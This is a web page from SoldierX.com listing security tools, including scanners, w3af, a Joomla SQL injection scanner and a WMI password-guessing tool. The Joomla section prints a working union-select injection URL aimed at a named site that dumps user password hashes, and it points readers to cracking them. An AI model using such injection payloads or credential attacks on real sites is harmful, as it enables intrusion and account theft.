SOLDIERX.COM Nobody Can Stop Information Insemination

Eraser is an advanced security tool for Windows which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 98, ME, NT, 2000, XP, Vista, Windows Server 2003 and Server 2008.
Eraser is Free software and its source code is released under GNU General Public License.

StartupMonitor is a small utility that runs transparently (it doesn't even use a tray icon) and notifies you when any program registers itself to run at system startup. It prevents annoying programs from registering themselves behind your back.

StartupMonitor does not require Startup Control Panel, but it complements it nicely. When you choose not to allow a program to register itself, the program's entry becomes disabled in Startup Control Panel, so you can go back and enable it later if necessary. StartupMonitor watches the Start Menu's Startup folders and the Run entries in the registry.

StartupMonitor works on all modern versions of Windows through XP. I hasn't been tested on Windows Vista yet.

SecureCentral(tm) have released ScanFi, an automated vulnerability scanner. Both commercial and free versions are available.

ScanFi has been designed to carry out the following:

Non-intrusively scans your enterprise network.

Provides a detailed inventory of your network assets.

Identifies network devices that are, (possibly), open to known vulnerabilities.

The ability to remedy vulnerable systems by deploying missing patches and service packs.

Provides detailed reports of the scan.

Schedule scans as and when required.

Inter-platform scanning i.e. Microsoft Windows and Linux.

Note:- The first point I may argue as it employs nmap for its port scan and other scanning techniques to gather results.

ScanFi is web-based with a mysql server backend for saving and producing the report format together with allowing full queries to be carried out against the on-board patch and vulnerability database.

ScanFi supports vulnerability assessments for the following systems and services which can be individually scanned against:

Web Servers
Database Servers
Application Servers
RPC Services
CGI Scripts
FTP
DNS
POP3
SNMP
SMTP
IMAP
SSH
SSL
Proxy Servers
UDP
TCP/IP
Registry
User Accounts
Dos Vulnerabilities
SQL Injection vulnerabilities
Trojans and Viruses
Switches
Routers
Windows
Linux
VPN's

OVAL's reference interpreter shows how: information can be collected from a computer; definitions can be used to test the system for computer vulnerabilities, configuration issues, programs, and patches; and results of the tests can be presented.

OVAL is an international, information security/community standard that has been designed to:

Promote open and publicly available security content,

Standardise the transfer of this information across the entire spectrum of security tools and services.

OVAL includes a language used to encode system details, and an assortment of content repositories held throughout the community. The language standardises the three main steps of the assessment process:

Representing configuration information of systems for testing;

Analysing the system for the presence of the specified machine state (vulnerability, configuration, patch state, etc.);

Reporting the results of this assessment.

One of the minor drawbacks of using the Mitre OVAL framework is that it is command-line based, which can prove time consuming when scans and updates to the framework need to be performed. SSA has been designed to add a graphical front-end to this process and also provides a great deal more extensibility when utilising the framework in conjunctions with their tool.

The NeXpose Community Edition is a free vulnerability scanner, a single-user version of Rapid7s' NeXpose Enterprise solution. Powered by the same scan engine the NeXpose Community Edition provides users with:

* Vulnerability scanning for up to 32 IPs
* Regular vulnerability updates
* Accurate scan results
* Prioritized risk assessment
* Remediation guidance
* Metasploit integration
* Community support at http://community.rapid7.com
* Simple deployment
* No cost start-up security solution

A web-scale networking platform enabling the next wave of VPN services

? Supports scalable and secure VPN services across Internet
? Works with existing enterprise applications
? Enables real-time interactive collaboration applications
? Remote and secure access to your network and application resources
? Secure and scalable Site-to-Site VPN
? Wireless security

w3af is a Web Application Attack and Audit Framework. The project goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.

The project uses a number of disparate plugins to carry out an audit against a target website, the main ones being:

* Discovery plugins have only one responsibility, finding new URLs, forms, and other “injection points”. A classic example of a discovery plugin is a web spider. This plugin takes a URL as input and returns one or more injection points. When a user enables more than one plugin of this type, they work recursively: If plugin A finds a new URL in the first run, the w3af core will send that URL to plugin B. If plugin B then finds a new URL, it will be sent to plugin A. This will go on until all plugins are run and no more knowledge about the application can be found using the enabled discovery plugins.

* Audit plugins take the injection points found by discovery plugins and send specially crafted data to all of them in order to find vulnerabilities. A classic example of an audit plugin is one that searches for SQL injection.

* Attack plugins objective is to exploit vulnerabilities found by audit plugins. They usually return a shell on the remote server, or a dump of remote databases in case of SQL injections.

The plugins find the URLs, discover the bugs and exploit them. The complete list of plugins types is:

* audit
* bruteforce
* discovery
* evasion
* exploit
* grep
* mangle
* output

Joomla Sql Injection Scanner is an exceedingly quick python based vulnerability scanner that can be utilized against Joomla servers. It is regularly updated by the author with the current exploitable holes (sql injection) that affect Joomla and is also extremely easy to use. Successful use of the tool will almost certainly provide you with a nice MD5 hash for the website to put into/ submit to your favourite MD5 cracker.

Installation:
Download the file
Python needs to be installed.

Execution:
Usage: ./joomsq.py

Example Output:
C:\Python25>joomsq.py www.mgn-games.org

Joomla Sql Injection Scanner v 1.0

beenudel1986[at]gmail[dot]com
[+] JoomlaPath: www.mgn-games.org
[+] Vuln. Loaded: 67
[+] Testing...

Host: http://www.mgn-games.org/index.php?option=com_pcchess&Itemid=61&page=playe
rs&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from
/**/jos_users/*
Found:
- 5e48e4c3a47af5dbfb0a0edcc0fbca55
- 5e48e4c3a47af5dbfb0a0edcc0fbca55
- 5e48e4c3a47af5dbfb0a0edcc0fbca55
- 5e48e4c3a47af5dbfb0a0edcc0fbca55

[-] Done

Right Click Download Link> save file/link as

Venom is a tool to run dictionary password attacks against Windows accounts by using the Windows Management Instrumentation (WMI) service. This can be useful in those cases where the server service has been disabled. The tool is written in VB6 and might require some additional runtime libraries to run.

Guessing speeds vary, but tend to be around 45-50 guesses/sec.

The password file supports the formats %username% and lc %username% with the result of the username being used as the password. The prefix lc converts the username to lowercase.

This general purpose plug-in exposes a number of advancements and anti-anti debugging features. Including: memory manipulation and dumping, module manipulation, detach support, bug fixes (format string and PE parsing) and a ton of other features (see screenshot and check .CHM help file).

The bundled .CHM file is out of date but documents the majority of the features.